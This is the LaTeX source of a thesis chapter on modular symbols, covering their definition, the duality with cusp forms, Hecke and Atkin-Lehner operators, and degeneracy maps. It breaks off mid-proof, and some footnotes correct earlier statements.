msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:083368b6-2d14-4d9f-8e33-d420137a492d>\",\"WARC-Concurrent-To\":\"<urn:uuid:c01cef13-1c67-4fc1-ba5a-0a42a43877ce>\",\"WARC-IP-Address\":\"140.82.113.4\",\"WARC-Target-URI\":\"https://github.com/cython/cython/issues/3208\",\"WARC-Payload-Digest\":\"sha1:ANXJW2TH5A4HUFIFXVLFZTMVG4ZOYJFC\",\"WARC-Block-Digest\":\"sha1:4ATAABJT66AC4OUURGYTV4E6LJKTYI3J\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496664469.42_warc_CC-MAIN-20191112001515-20191112025515-00115.warc.gz\"}"}
https://ir.library.oregonstate.edu/concern/articles/4f16c3463
[ "# Article\n\n## Well-Posed Problems for a Partial Differential Equation of Order 2m + 1 Public Deposited", null, "Download PDF\nhttps://ir.library.oregonstate.edu/concern/articles/4f16c3463\n\n## Descriptions\n\nAttribute NameValues\nCreator\nAbstract\n• We are concerned here with well-posed problems for the partial differential equation uₜ(x, t) + yMuₜ(x, t) + Lu(x, t) = f(x, t) containing the elliptic differential operator M of order 2m and the differential operator L of order ≤2m. Hilbert space methods are used to formulate and solve an abstract form of the problem and to discuss existence, uniqueness, asymptotic behavior and boundary conditions of a solution. The formulation of a generalized problem is the objective of ∮ 1, and we shall have reason to consider two types of solutions, called weak and strong. Sufficient conditions on the operator M are given for the existence and uniqueness of a weak solution to the generalized problem. These conditions constitute elliptic hypotheses on M and are discussed briefly in ∮ 3. Similar assumptions on L lead to results on the asymptotic behavior of a weak solution. The case in which M and L are equal and self-adjoint is discussed in ∮ 2, and it is here that the role of the coefficient y of the equation appears first. Special as it is, this is a situation that often arises in applications, and there has been considerable interest in this coefficient y , . The weak and strong solutions are distinguished not only by regularity conditions but also by their associated boundary conditions. It first appears in ∮ 5 that it is possible to prescribe too many (independent) boundary conditions on a strong solution, but in the applications it is seen that the interdependence of these conditions is built into the assumptions on the domains of the operators. Two examples of applications appear in ∮ 6 with a discussion of the types of boundary conditions that are appropriate.\nResource Type\nDOI\nDate Available\nDate Issued\nCitation\n• Showalter, R. E. (1970). Well-posed problems for a partial differential equation of order 2m+1. SIAM Journal on Mathematical Analysis, 1(2), 214-231. doi:10.1137/0501020\nJournal Title\nJournal Volume\n• 1\nJournal Issue/Number\n• 2\nRights Statement\nRelated Items\nPublisher\nPeer Reviewed\nLanguage\nReplaces" ]
[ null, "https://ir.library.oregonstate.edu/downloads/4f16c347c", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.52334505,"math_prob":0.85598457,"size":669,"snap":"2021-31-2021-39","text_gpt3_token_len":162,"char_repetition_ratio":0.0962406,"word_repetition_ratio":0.0,"special_character_ratio":0.20627803,"punctuation_ratio":0.07865169,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9594052,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-01T13:55:20Z\",\"WARC-Record-ID\":\"<urn:uuid:622ffc35-664c-47be-83fe-140f508ebf5c>\",\"Content-Length\":\"27980\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7a1adc76-20d9-4271-8118-61853c104528>\",\"WARC-Concurrent-To\":\"<urn:uuid:9bd34a2f-c174-46b2-a84a-c48829b62c29>\",\"WARC-IP-Address\":\"128.193.164.152\",\"WARC-Target-URI\":\"https://ir.library.oregonstate.edu/concern/articles/4f16c3463\",\"WARC-Payload-Digest\":\"sha1:KJ57B3R2XJF766OJPDCO5AU475IHOABG\",\"WARC-Block-Digest\":\"sha1:IQVWTE25SDF6CTKWTRB3DS3U4QQKC3RP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154214.36_warc_CC-MAIN-20210801123745-20210801153745-00073.warc.gz\"}"}
https://smithfieldjustice.com/31-mole-worksheet-1/
[ "HomeTemplate ➟ 31 31 Mole Worksheet 1\n\n31 Mole Worksheet 1", null, "Chemistry Mole Calculation Worksheet Interactive worksheet mole conversions chem worksheet 11 3 answer key pdf, mole conversion worksheet 11 3 answers, mole conversion chem worksheet 11 3 answers, mole conversions chem worksheet 11 3 key, mole worksheet 1 moles particles answer key, image source: liveworksheets.com" ]
[ null, "https://smithfieldjustice.com/wp-content/uploads/2020/02/mole-worksheet-1.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63554895,"math_prob":0.8310547,"size":791,"snap":"2022-05-2022-21","text_gpt3_token_len":163,"char_repetition_ratio":0.27064803,"word_repetition_ratio":0.057142857,"special_character_ratio":0.18836915,"punctuation_ratio":0.1171875,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9786439,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-22T12:12:07Z\",\"WARC-Record-ID\":\"<urn:uuid:d613ad5a-240e-4dc9-9244-0900e7bf221c>\",\"Content-Length\":\"33868\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3625a639-21d6-4964-b60a-ef61fdfe8edf>\",\"WARC-Concurrent-To\":\"<urn:uuid:3d121c2e-c7cf-4cbd-991e-2f0c366115a4>\",\"WARC-IP-Address\":\"172.67.190.110\",\"WARC-Target-URI\":\"https://smithfieldjustice.com/31-mole-worksheet-1/\",\"WARC-Payload-Digest\":\"sha1:UFSTLCEAFKN76EZEXTIEN7KH5IAMO5R2\",\"WARC-Block-Digest\":\"sha1:AWRTEN4JCHFNZC3NAGO3PZXNX6VCPGGL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320303845.33_warc_CC-MAIN-20220122103819-20220122133819-00452.warc.gz\"}"}
https://answers.everydaycalculation.com/divide-fractions/9-2-divided-by-18-45
[ "Solutions by everydaycalculation.com\n\n## Divide 9/2 with 18/45\n\n1st number: 4 1/2, 2nd number: 18/45\n\n9/2 ÷ 18/45 is 45/4.\n\n#### Steps for dividing fractions\n\n1. Find the reciprocal of the divisor\nReciprocal of 18/45: 45/18\n2. Now, multiply it with the dividend\nSo, 9/2 ÷ 18/45 = 9/2 × 45/18\n3. = 9 × 45/2 × 18 = 405/36\n4. After reducing the fraction, the answer is 45/4\n5. In mixed form: 111/4\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.73321223,"math_prob":0.9765787,"size":377,"snap":"2021-31-2021-39","text_gpt3_token_len":182,"char_repetition_ratio":0.19839142,"word_repetition_ratio":0.0,"special_character_ratio":0.5225464,"punctuation_ratio":0.082474224,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95967716,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-19T21:28:59Z\",\"WARC-Record-ID\":\"<urn:uuid:80e6619b-583a-494d-9dbe-4800c4177ed9>\",\"Content-Length\":\"8128\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7a5c796a-5e56-4595-95d1-cac0643ad42d>\",\"WARC-Concurrent-To\":\"<urn:uuid:74026031-b613-43ff-b870-3bb5ff98829f>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/divide-fractions/9-2-divided-by-18-45\",\"WARC-Payload-Digest\":\"sha1:3CPD4S626VNIQ34OCWFBIPBOZM6ZYGP7\",\"WARC-Block-Digest\":\"sha1:SHMGPQMVGTKEKKWO56WMWBVSRJFL5CPI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780056900.32_warc_CC-MAIN-20210919190128-20210919220128-00247.warc.gz\"}"}
https://share.cocalc.com/share/5d54f9d642cd3ef1affd88397ab0db616c17e5e0/www/papers/thesis/src/modsyms.tex?viewer=share
[ "Author: William A. Stein\nCompute Environment: Ubuntu 18.04 (Deprecated)\n1\\comment{\n2% $Header: /home/was/papers/thesis/RCS/modsyms.tex,v 1.7 2000/05/10 20:31:58 was Exp$\n3\n4$Log: modsyms.tex,v$\n5Revision 1.7 2000/05/10 20:31:58 was\n6done.\n7\n8Revision 1.6 2000/05/10 08:53:23 was\n9misc. don't remember.\n10\n11Revision 1.5 2000/05/09 03:02:10 was\n12Re-indexed the whole chapter.\n13\n14Revision 1.4 2000/05/08 15:48:28 was\n15Added $Log: modsyms.tex,v$\n16Added Revision 1.7 2000/05/10 20:31:58 was\n19Added Revision 1.6 2000/05/10 08:53:23 was\n22Added Revision 1.5 2000/05/09 03:02:10 was\n25\n26}\n27\n28\n29\\chapter{Modular symbols}%\n30\\label{chap:modsym}\\index{Modular symbols}%\n31Modular symbols permeate this thesis. In their simplest incarnation,\n32modular symbols provide a finite presentation for the homology group\n33$H_1(X_0(N),\\Z)$ of the Riemann surface $X_0(N)$. This presentation\n34is equipped with such a rich structure that from it we can deduce the\n35action of the Hecke operators; this is already sufficient information for\n36us to compute a basis for the space $S_2(\\Gamma_0(N),\\C)$ of cusp\n37forms.\n38\n39We recall the definition of spaces of modular symbols in\n40Sections~\\ref{sec:defnofmodsyms}--\\ref{cuspidalsymbols}. Then in\n41Section~\\ref{sec:duality}, we review the\n42duality between modular symbols and modular forms.\n43In Section~\\ref{sec:heckeops}, we see that\n44modular symbols are furnished with analogues of each of the standard\n45operators that one finds on spaces of modular forms, and in\n46Section~\\ref{sec:degeneracymaps} we see that the same is true of the\n47degeneracy maps. Section~\\ref{sec:maninsymbols} describes Manin\n48symbols, which supply a convenient finite presentation for the space of\n49modular symbols. Finally, Section~\\ref{sec:tori} introduces the\n50complex torus attached to a newform, which appears in various guises\n51throughout this thesis.\n52\n53\n54Before continuing, we offer an apology. We will only consider modular\n55symbols that are already equipped with a fixed Dirichlet character.\n56Though fixing a character complicates the formulas, the resulting increase\n57in efficiency is of extreme value in computational applications.\n58Fixing a character allows us to compute in just the part of the space\n59of modular symbols for $\\Gamma_1(N)$ that interests us. We apologize\n60for any inconvenience this may cause the less efficiency minded\n62\n63{\\bf Acknowledgment.} This chapter and the next were greatly\n64influenced by the publications of Cremona~\\cite{cremona:gammaone,\n65cremona:algs}\\index{Cremona} and Merel~\\cite{merel:1585}\\index{Merel},\n66along with the foundational contributions of\n67Manin~\\cite{manin:parabolic}, Mazur~\\cite{mazur:arithmetic_values,\n68mazur:symboles}, and Shokurov~\\cite{sokurov:modsym}. Cremona's\n69book~\\cite{cremona:algs} provides a motivated roadmap that guides the\n70reader who wishes to compute with modular symbols in the familiar\n71context of elliptic curves, and Merel's\\index{Merel} article provides an accessible\n72overview of the action of Hecke operators on higher weight modular\n73symbols, and the connection between modular symbols and related\n74cohomology theories.\n75\n76\\section{The definition of modular symbols}\n77\\label{sec:defnofmodsyms}\n78Fix a positive integer~$N$, an integer $k\\geq 2$, and a continuous\n79homomorphism\n80 $$\\eps:(\\Z/N\\Z)^*\\ra\\C^*$$\n81such that $\\eps(-1)=(-1)^k$.\n82We call~$N$ the \\defn{level}\\index{Level of modular symbols|textit},~$k$ the\n83\\defn{weight}\\index{Weight of modular symbols|textit},\n84and~$\\eps$ the \\defn{Dirichlet character}.\\index{Dirichlet character|textit}\n85\n86\n87Consider the quotient of the abelian group generated by all formal symbols\n88$\\{\\alp,\\beta\\}$, with $\\alp, \\beta\\in\\P^1(\\Q)=\\Q\\union\\{\\infty\\}$,\n89by the following relations:\n90 $$\\{\\alp,\\beta\\}+\\{\\beta,\\gamma\\}+\\{\\gamma,\\alp\\} = 0,$$\n91for all $\\alp,\\beta,\\gamma\\in\\P^1(\\Q)$.\n92Let $\\sM$ be the torsion-free quotient of this group by its torsion\n93subgroup. Because $\\sM$ is torsion free, $\\{\\alp,\\alp\\}=0$ and\n94$\\{\\alp,\\beta\\} = -\\{\\beta,\\alp\\}$.\n95\\index{Modular symbols!relations satisfied by}\n96\n97\\begin{remark}\n98One is motivated to consider these relations by viewing\n99$\\{\\alp,\\beta\\}$ as the homology class of an appropriate\n100path from~$\\alpha$ to~$\\beta$ in the upper half plane.\n101\\end{remark}\n102\n103Let $V_{k-2}$\\label{defn:vk} be the $\\Z$-submodule of $\\Z[X,Y]$ made up of\n104all homogeneous polynomials of degree $k-2$, and set\n105 $\\sM_k := V_{k-2}\\tensor\\sM.$\n106\\label{pg:higherweightmodsym}\n107For $g=\\abcd{a}{b}{c}{d}\\in\\GL_2(\\Q)$ and $P\\in V_{k-2}$, let\n108\\begin{align*}\n109 gP(X,Y) &= P\\left(\\det(g)g^{-1}\\vtwo{X}{Y}\\right)\n110 = P\\left(\\mtwo{\\hfill d}{-b}{-c}{\\hfill a}\\vtwo{X}{Y}\\right)\\\\\n111 &= P(dX-bY,-cX+aY).\n112\\end{align*}\n113This defines a left action of $\\GL_2(\\Q)$ on $V_{k-2}$;\n114it is a left action because\n115\\begin{align*}\n116 (gh)P(v) &= P(\\det(gh)(gh)^{-1}v)\n117 = P(\\det(h)h^{-1}\\det(g)g^{-1}v)\\\\\n118 &= gP(\\det(h)h^{-1}v) = g(hP(v)).\n119\\end{align*}\n120Combining this action with the action of $\\GL_2(\\Q)$ on $\\P^1(\\Q)$\n121by linear fractional transformations gives\n122a left action of $\\GL_2(\\Q)$ on $\\sM_k$:\n123 $$g (P \\tensor \\{\\alp,\\beta\\}) = g(P)\\tensor\\{g(\\alp),g(\\beta)\\}.$$\n124Finally, for $g=\\abcd{a}{b}{c}{d}\\in\\Gamma_0(N)$, let\n125$\\eps(g) := \\eps(\\overline{a})$,\n126where $\\overline{a}\\in\\Z/N\\Z$ is the reduction modulo~$N$ of~$a$.\n127\n128Let\n129$$\\Z[\\eps] := \\Z[\\eps(a) : a \\in \\Z/N\\Z]$$\n130be the subring of~$\\C$ generated by the values of the\n131character~$\\eps$.\n132\\begin{definition}[Modular symbols]\\label{defn:modsym}\n133\\index{Modular symbols|textit}%\n134The space of \\defn{modular symbols} $\\sM_k(N,\\eps)$\n135of level~$N$, weight~$k$ and character~$\\eps$ is\n136the largest torsion-free quotient of $\\sM_k\\tensor\\Z[\\eps]$ by the\n137$\\Z[\\eps]$-submodule generated by the\n138relations $gx-\\eps(g)x$ for all $x\\in\\sM_k$\n139and all $g\\in\\Gamma_0(N)$.\n140\\end{definition}\n141Denote by $P\\{\\alp,\\beta\\}$ the image\n142of $P\\tensor\\{\\alp,\\beta\\}$ in $\\sM_k(N,\\eps)$.\n143For any $\\Z[\\eps]$-algebra~$R$, let\n144$$\\sM_k(N,\\eps;R) := \\sM_k(N,\\eps)\\tensor_{Z[\\eps]} R.$$\n145See Section~\\ref{sec:computingmk} for an algorithm which\n146can be used to compute $\\sM_k(N,\\eps;\\Q(\\eps))$.\n147\n148\\section{Cuspidal modular symbols}\n149\\label{cuspidalsymbols}\n150\\index{Cuspidal modular symbols|textit}\n151Let~$\\sB$ be the free abelian group generated by the symbols\n152$\\{\\alp\\}$ for all $\\alp\\in\\P^1(\\Q)$.\n153There is a left action of~$\\GL_2(\\Q)$ on~$\\sB$ given by\n154$g\\{\\alp\\}=\\{g(\\alp)\\}$.\n155Let $\\sB_k := V_{k-2}\\tensor \\sB$, and let $\\GL_2(\\Q)$ act\n156on $\\sB_k$ by $g(P\\{\\alp\\}) = (gP)\\{g(\\alp)\\}$.\n157\\begin{definition}[Boundary modular symbols]\\label{def:boundarysymbols}\n158The space $\\sB_k(N,\\eps)$ of\n159\\index{Boundary modular symbols|textit}%\n160\\defn{boundary modular symbols}\n161is the largest torsion-free quotient\n162of $\\sB_k\\tensor\\Z[\\eps]$ by the relations\n163$gx = \\eps(g) x$ for all\n164$g\\in \\Gamma_0(N)$ and $x\\in \\sB_k$.\n165\\end{definition}\n166Denote by $P\\{\\alp\\}$ the image of $P\\tensor\\{\\alp\\}$\n167in $\\sB_k(N,\\eps)$.\n168The \\defn{boundary map}\n169 $$\\delta: \\sM_k(N,\\eps) \\ra \\sB_k(N,\\eps)$$\n170is defined by\n171 $$\\delta(P\\{\\alp,\\beta\\}) = 172 P\\{\\beta\\}-P\\{\\alp\\}.$$\n173\\begin{definition}[Cuspidal modular symbols]%\n174\\label{defn:cuspidalmodularsymbols}%\n175\\index{Cuspidal modular symbols|textit}%\n176The space $\\sS_k(N,\\eps)$ of\n177\\defn{cuspidal modular symbols}\n178is the kernel of~$\\delta$.\n179\\end{definition}\n180The three spaces defined above fit together in the\n181following exact sequence:\n182 $$0\\ra \\sS_k(N,\\eps) \\ra\\sM_k(N,\\eps)\\xrightarrow{\\,\\delta\\,} 183 \\sB_k(N,\\eps).$$\n184\n185\n186\n187\\section{Duality between modular symbols and modular forms}%\n188\\label{sec:duality}\n189\\index{Modular symbols!duality with modular forms}%\n190\\index{Modular forms!duality with modular symbols}%\n191\\index{Integration pairing}%\n192For any positive integer~$k$, any $\\C$-valued function~$f$ on\n193the complex upper half plane\n194$$\\h:=\\{z \\in \\C : \\im(z) > 0\\},$$\n195and any matrix $\\gamma\\in\\GL_2(\\Q)$, define a function\n196$f|[\\gamma]_k$ on~$\\h$ by\n197 $$(f|[\\gamma]_k)(z) = \\det(\\gamma)^{k-1}\\frac{f(\\gamma z)}{(cz+d)^{k}}.$$\n198\\begin{definition}[Cusp forms]\\index{Cusp forms|textit}\n199Let $S_k(N,\\eps)$ be the complex vector space of holomorphic\n200functions $f(z)$ on~$\\h$ that satisfy\n201the equation\n202 $$f|[\\gamma]_k = \\eps(\\gamma)f$$\n203for all $\\gamma\\in\\Gamma_0(N)$, and such that~$f$\n204is holomorphic and vanishes at all cusps, in the sense of\n205\\cite[pg.~42]{diamond-im}.\n206\\end{definition}\n207\n208\\begin{definition}[Antiholomorphic cusp forms]%\n209\\index{Cusp forms!antiholomorphic|textit}%\n210\\index{Antiholomorphic cusp forms|textit}\n211Let $\\Sbar_k(N,\\eps)$ be the space of\n212\\defn{antiholomorphic cusp forms};\n213the definition is as above, except\n214$$\\frac{f(\\gamma z)}{(c\\overline{z}+d)^k} = \\overline{\\eps}(\\gamma) f(z)$$\n215for all $\\gamma\\in\\Gamma_0(N)$.\\footnote{The $\\overline{\\eps}$\n216should be replaced by~$\\eps$ in this formula, as\n217in \\cite[\\S2.5]{merel:1585}.}\n218\\end{definition}\n219There is a canonical isomorphism of real vector spaces\n220between $S_k(N,\\eps)$ and $\\Sbar_k(N,\\eps)$ that associates\n221to~$f$ the antiholomorphic cusp form defined by the function\n222$z\\mapsto \\overline{f(z)}$.\n223\n224\\begin{theorem}[Merel]\\label{thm:perfectpairing}\\index{Merel}\n225There is a pairing\n226\\begin{equation*}\n227 \\langle\\,\\, , \\, \\, \\rangle:\n228 (S_k(N,\\eps)\\oplus \\Sbar_k(N,\\eps)) \\cross \\sM_k(N,\\eps;\\C)\n229 \\ra \\C\n230\\end{equation*}\n231given by\n232$$\\langle f\\oplus g, P\\{\\alp,\\beta\\}\\rangle = 233 \\int_{\\alp}^{\\beta} f(z)P(z,1) dz 234 + \\int_{\\alp}^{\\beta} g(z)P(\\zbar,1) d\\zbar,$$\n235where the path from~$\\alp$ to~$\\beta$ is,\n236except for the endpoints, contained in~$\\h$.\n237The pairing is perfect when restricted to $\\sS_k(N,\\eps;\\C)$.\n238\\end{theorem}\n239\\begin{proof}\n240Take the~$\\eps$ part of each side of~\\cite[Thm.~3]{merel:1585}.\n241\\end{proof}\n242\n243\n244\\section{Linear operators}\n245\\label{sec:heckeops}\n246\\subsection{Hecke operators}\\label{heckeops:modsym}\n247\\index{Hecke operators}\\index{Operators!Hecke}\n248For each positive integer~$n$ and each space~$V$ of modular symbols or modular\n249forms, there is a \\defn{Hecke operator}~$T_n$, which acts\n250as a linear endomorphism of~$V$.\n251For the definition of $T_n$ on modular symbols,\n252see~\\cite[\\S2]{merel:1585}.\n253Alternatively, because we consider only modular symbols\n254with character, the following\n255recipe completely determines the Hecke operators.\n256First, when $n=p$ is prime, we have\n257$$T_p(x) = \\left[ \\mtwo{p}{0}{0}{1} + \\sum_{r \\md p} 258 \\mtwo{1}{r}{0}{p}\\right] x,$$\n259where the first matrix is omitted if $p\\mid N$.\n260If~$m$ and~$n$ are coprime, then $T_{mn} = T_mT_n$.\n261Finally, if~$p$ is a prime, $r\\geq 2$ is an integer,~$\\varepsilon$ is\n262the Dirichlet character of associated to~$V$, and~$k$ is the weight\n263of~$V$, then\n264 $$T_{p^r} = 265 T_p T_{p^{r-1}} - \\varepsilon(p) p^{k-1} T_{p^{r-2}}.$$\n266\n267\\begin{definition}\\index{Hecke algebra|textit}\n268The \\defn{Hecke algebra associated to $V$} is the subring\n269 $$\\T=\\T_V = \\Z[\\ldots T_n \\ldots]$$\n270of $\\End(V)$ generated by all Hecke operators $T_n$, with $n=1,2,3,\\ldots$.\n271\\end{definition}\n272\n273\\begin{proposition}\\label{prop:modsympairing}\n274The pairing of Theorem~\\ref{thm:perfectpairing} respects the\n275action of the Hecke operators\\index{Hecke operators!respect pairing},\n276in the sense that $\\langle f T, x \\rangle = \\langle f , T x \\rangle$\n277for all $T\\in \\T$, $x\\in\\sM_k(N,\\eps)$,\n278 and $f\\in S_k(N,\\eps)\\oplus \\Sbar_k(N,\\eps)$.\n279\\end{proposition}\n280\\begin{proof}\n281See~\\cite[Prop.~10]{merel:1585}.\n282\\end{proof}\n283\n284\\subsection{The $*$-involution}\\label{sec:starinvolution}\n285\\index{Star involution|textit}\\index{Operators!$*$-involution|textit}\n286The matrix $j=\\abcd{-1}{0}{\\hfill0}{1}$ defines\n287an involution~$*$ of $\\sM_k(N,\\eps)$ given by\n288$x\\mapsto x^*=j(x)$. Explicitly,\n289\\begin{equation*}\n290(P(X,Y)\\{\\alp,\\beta\\})^* = P(X,-Y)\\{-\\alp,-\\beta\\}.\n291\\end{equation*}\n292Because the space of modular symbols is constructed as a quotient,\n293it is not obvious that the $*$-involution is well defined.%\n294\\index{Star involution!is well defined}\n295\\begin{proposition}\n296The $*$-involution is well defined.\n297\\end{proposition}\n298\\begin{proof}\n299Recall that $\\sM_k(N,\\eps)$ is the largest torsion-free quotient of the\n300free $\\Z[\\eps]$-module generated by symbols\n301$x=P\\{\\alp,\\beta\\}$ by the submodule generated by\n302relations $\\gamma x - \\eps(\\gamma)x$ for\n303all $\\gamma\\in \\Gamma_0(N)$.\n304In order to check that the operator~$*$ is well defined, it\n305suffices to check, for any $x\\in\\sM_k$, that\n306$*(\\gamma x - \\eps(\\gamma)x)$ is of\n307the form $\\gamma' y - \\eps(\\gamma') y$, for some~$y$ in $\\sM_k$.\n308Note that if $\\gamma=\\abcd{a}{b}{c}{d}\\in \\Gamma_0(N)$, then\n309$j\\gamma j^{-1} = \\abcd{\\hfill a}{-b}{-c}{\\hfill d}$ is also in $\\Gamma_0(N)$\n310and $\\eps(j\\gamma j^{-1}) = \\eps(\\gamma)$. We have\n311\\begin{align*}\n312 j(\\gamma x - \\eps(\\gamma) x) &=\n313 j \\gamma x - j \\eps(\\gamma) x \\\\\n314 &= j \\gamma j^{-1} j x - \\eps(\\gamma) j x\\\\\n315 &= (j\\gamma j^{-1}) (j x) - \\eps(j \\gamma j^{-1}) (jx).\n316\\end{align*}\n317\\end{proof}\n318\n319If~$f$ is a modular form\\index{Modular forms}, let $f^*$ be the holomorphic\n320function $\\overline{f(-\\overline{z})}$, where the bar\n321denotes complex conjugation.\n322 The Fourier coefficients\\index{Fourier coefficients}\n323of $f^*$ are the complex conjugates of those of~$f$; though $f^*$\n324is again a holomorphic modular form\\index{Modular forms}, its character\n325is $\\overline{\\eps}$ instead of~$\\eps$.\n326The pairing of Theorem~\\ref{thm:perfectpairing}\n327is the restriction of a pairing on the full spaces without\n328character, and we have the following proposition.\n329\\index{Star involution!and integration pairing}\n330\\begin{proposition}\\label{prop:starpairing}\\footnote{G. Weber pointed\n331out that this isn't correct. It is correct if the pairing is replaced\n332by $(f,x) = -2\\pi i\\langle f, x\\rangle$ and $x$ is\n333restricted to modular symbols that are fixed by complex\n334conjugation.}\n335We have\n336\\begin{equation*}\n337\\langle f^*, x^* \\rangle = \\overline{\\langle f, x\\rangle}.\n338\\end{equation*}\n339\\end{proposition}\n340\n341\\begin{definition}[Plus-one quotient]\\index{Plus-one quotient|textit}%\n342\\index{Modular symbols!plus-one quotient of}\n343\\index{Modular symbols!minus-one quotient of}\n344The \\defn{plus-one quotient} $\\sM_k(N,\\eps)_+$ is the\n345largest torsion-free quotient of $\\sM_k(N,\\eps)$ by the relations\n346$x^*-x=0$ for all $x\\in \\sM_k(N,\\eps)$.\n347Similarly, the \\defn{minus-one quotient}\\index{Minus-one quotient}\n348is the quotient of $\\sM_k(N,\\eps)$ by all relations\n349$x^*+x=0$, for $x\\in\\sM_k(N,\\eps)$.\n350\\end{definition}\n351\n352\\begin{warning} We were forced to make\n353a choice in our definition of the operator~$*$.\n354Fortunately, it agrees with that of~\\cite[\\S2.1.3]{cremona:algs},\n355but {\\em not} with the choice made in~\\cite[\\S1.6]{merel:1585}.\n356\\end{warning}\n357\n358\\subsection{The Atkin-Lehner involutions}\\label{sec:atkin-lehner}\n359\\index{Operators!Atkin-Lehner|textit}\n360\\index{Atkin-Lehner involution|textit}\n361In this section we assume\n362that~$k$ is even and $\\eps^2=1$.\n363The assumption on~$\\eps$ is necessary only so that\n364the involution we are about to define preserves\n365$\\sM_k(N,\\eps)$. More generally, it is possible to define\n366a map which sends $\\sM_k(N,\\eps)$ to $\\sM_k(N,\\overline{\\eps})$.\n367\n368To each divisor~$d$ of~$N$ such that $(d,N/d)=1$ there is an\n369\\defn{Atkin-Lehner involution}~$W_d$ of $\\sM_k(N,\\eps)$,\n370which is defined as follows. Using the Euclidean algorithm, choose\n371integers $x,y,z,w$ such that\n372 $$dxw - (N/d)yz = 1.$$\n373Next let $g=\\abcd{dx}{y}{Nz}{dw}$ and define\n374 $$W_d(x) \\define \\frac{1}{d^{\\frac{k-2}{2}}}\\cdot g(x).$$\n375For example, when $d=N$ we have $g=\\abcd{0}{-1}{N}{\\hfill 0}$.\n376The factor of $d^{\\frac{k-2}{2}}$ is necessary to normalize\n377$W_d$ so that it is an involution.\n378\n379On modular forms there is an Atkin-Lehner involution,\n380also denoted $W_d$,\\index{Modular forms!and Atkin-Lehner involution}\n381which acts by $W_d(f) = f|[W_d]_k$. These two like-named involutions\n382are compatible with the integration pairing:\n383$$\\langle W_d(f), x\\rangle = \\langle f, W_d(x)\\rangle.$$\n384\\index{Atkin-Lehner involution!and integration pairing}\n385\n386\\section{Degeneracy maps}\n387\\label{sec:degeneracymaps}\n388\\label{pg:degeneracymaps}\n389\\index{Degeneracy maps}\n390In this section, we describe natural maps between spaces of\n391modular symbols of different levels.\n392\n393Fix a positive integer~$N$ and a Dirichlet\n394character\\index{Dirichlet character}\n395$\\eps : (\\Z/N\\Z)^*\\ra \\C^*$. Let~$M$ be a positive divisor\n396of~$N$ that is divisible by the conductor of~$\\eps$, in the sense\n397that~$\\eps$ factors through $(\\Z/M\\Z)^*$ via the natural map\n398$(\\Z/N\\Z)^*\\ra (\\Z/M\\Z)^*$ composed with some uniquely defined\n399character $\\eps':(\\Z/M\\Z)^*\\ra\\C^*$. For any positive divisor~$t$ of\n400$N/M$, let $T=\\abcd{1}{0}{0}{t}$ and fix a choice $D_t=\\{T\\gamma_i : 401i=1,\\ldots, n\\}$ of coset representatives for $\\Gamma_0(N)\\backslash 402T\\Gamma_0(M)$.\n403\n404\\begin{warning}\n405There is a mistake in \\cite[\\S2.6]{merel:1585}:\n406 The quotient $\\Gamma_1(N)\\backslash\\Gamma_1(M)T$'' should be replaced\n407by $\\Gamma_1(N)\\backslash T\\Gamma_1(M)$''.\n408\\end{warning}\n409\\begin{proposition}\n410For each divisor~$t$ of $N/M$ there are well-defined linear maps\n411\\begin{align*}\n413 \\alp_t(x) = (tT^{-1})x = \\mtwo{t}{0}{0}{1} x\\\\\n415 \\beta_t(x) = \\sum_{T\\gam_i\\in D_t} \\eps'(\\gam_i)^{-1}T\\gam_i{} x.\n416\\end{align*}\n417Furthermore,\n418 $\\alp_t\\circ \\beta_t$ is multiplication by\n419 $t^{k-2}\\cdot [\\Gamma_0(M) : \\Gamma_0(N)].$\n420\\end{proposition}\n421\\begin{proof}\n422To show that~$\\alp_t$ is well defined, we must show that for\n423each $x\\in\\sM_k(N,\\eps)$ and $\\gam=\\abcdmat\\in\\Gamma_0(N)$, that we\n424have\n425 $$\\alp_t(\\gamma x -\\eps(\\gamma) x)=0\\in\\sM_k(M,\\eps').$$\n426We have\n427$$\\alp_t(\\gam x) = \\mtwo{t}{0}{0}{1}\\gam x 428 = \\mtwo{a}{tb}{c/t}{d}\\mtwo{t}{0}{0}{1} x 429 = \\eps'(a)\\mtwo{t}{0}{0}{1} x,$$\n430so\n431$$\\alp_t(\\gamma x -\\eps(\\gamma) x) 432 = \\eps'(a)\\alp_t(x) - \\eps(\\gamma)\\alp_t(x) = 0.$$\n433\n434We next verify that~$\\beta_t$ is well defined.\n435Suppose that $x\\in\\sM_k(M,\\eps')$ and $\\gamma\\in\\Gamma_0(M)$;\n436then $\\eps'(\\gam)^{-1}\\gam x = x$, 